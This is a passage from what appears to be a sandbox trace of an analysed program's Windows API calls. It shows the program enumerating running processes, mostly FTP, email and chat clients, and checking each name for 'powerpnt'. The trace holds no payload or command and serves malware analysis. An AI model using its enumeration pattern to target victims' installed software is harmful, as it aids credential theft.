lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.969] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578cd8 [0098.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3578cd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0098.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0098.969] StrStrIA (lpFirst="barca.exe", lpSrch="powerpnt") returned 0x0 [0098.970] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0098.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.971] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578eb8 [0098.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3578eb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0098.971] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0098.971] StrStrIA (lpFirst="bitkinex.exe", lpSrch="powerpnt") returned 0x0 [0098.971] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0098.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.972] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578f78 [0098.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578f78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0098.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0098.972] StrStrIA (lpFirst="coreftp.exe", lpSrch="powerpnt") returned 0x0 [0098.972] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0098.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.974] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f30 [0098.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574f30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0098.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0098.974] StrStrIA (lpFirst="far.exe", lpSrch="powerpnt") returned 0x0 [0098.974] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0098.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.975] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578f60 [0098.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3578f60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0098.975] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0098.975] StrStrIA (lpFirst="filezilla.exe", lpSrch="powerpnt") returned 0x0 [0098.975] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0098.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.977] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578e88 [0098.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3578e88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0098.977] StrStrIA (lpFirst="flashfxp.exe", lpSrch="powerpnt") returned 0x0 [0098.977] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0098.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.978] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578df8 [0098.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3578df8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0098.978] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0098.978] StrStrIA (lpFirst="fling.exe", lpSrch="powerpnt") returned 0x0 [0098.978] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0098.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.980] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a0f8 [0098.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357a0f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0098.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0098.980] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="powerpnt") returned 0x0 [0098.980] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0098.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.981] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a118 [0098.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357a118, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0098.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0098.981] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="powerpnt") returned 0x0 [0098.981] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0098.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.982] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f60 [0098.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574f60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0098.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0098.982] StrStrIA (lpFirst="icq.exe", lpSrch="powerpnt") returned 0x0 [0098.982] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0098.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.984] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578d68 [0098.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578d68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0098.984] StrStrIA (lpFirst="leechftp.exe", lpSrch="powerpnt") returned 0x0 [0098.984] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0098.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.985] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578d80 [0098.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578d80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.985] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0098.985] StrStrIA (lpFirst="ncftp.exe", lpSrch="powerpnt") returned 0x0 [0098.985] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0098.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.986] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578d98 [0098.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3578d98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0098.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0098.987] StrStrIA (lpFirst="notepad.exe", lpSrch="powerpnt") returned 0x0 [0098.987] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.006] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578db0 [0099.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3578db0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0099.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0099.006] StrStrIA (lpFirst="operamail.exe", lpSrch="powerpnt") returned 0x0 [0099.006] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0099.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.007] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578e40 [0099.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3578e40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0099.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0099.007] StrStrIA (lpFirst="outlook.exe", lpSrch="powerpnt") returned 0x0 [0099.007] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.008] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578e10 [0099.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3578e10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0099.009] StrStrIA (lpFirst="pidgin.exe", lpSrch="powerpnt") returned 0x0 [0099.009] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.010] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578f90 [0099.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578f90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0099.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0099.010] StrStrIA (lpFirst="scriptftp.exe", lpSrch="powerpnt") returned 0x0 [0099.010] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.011] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578ed0 [0099.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3578ed0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0099.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0099.011] StrStrIA (lpFirst="skype.exe", lpSrch="powerpnt") returned 0x0 [0099.011] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.013] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578de0 [0099.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578de0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0099.013] StrStrIA (lpFirst="smartftp.exe", lpSrch="powerpnt") returned 0x0 [0099.013] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0099.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.014] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578e58 [0099.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3578e58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0099.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0099.014] StrStrIA (lpFirst="thunderbird.exe", lpSrch="powerpnt") returned 0x0 [0099.014] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.016] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578ca8 [0099.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3578ca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0099.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0099.017] StrStrIA (lpFirst="totalcmd.exe", lpSrch="powerpnt") returned 0x0 [0099.017] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.018] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578dc8 [0099.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3578dc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0099.018] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0099.021] StrStrIA (lpFirst="trillian.exe", lpSrch="powerpnt") returned 0x0 [0099.021] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.022] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578cf0 [0099.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3578cf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0099.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0099.022] StrStrIA (lpFirst="webdrive.exe", lpSrch="powerpnt") returned 0x0 [0099.022] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 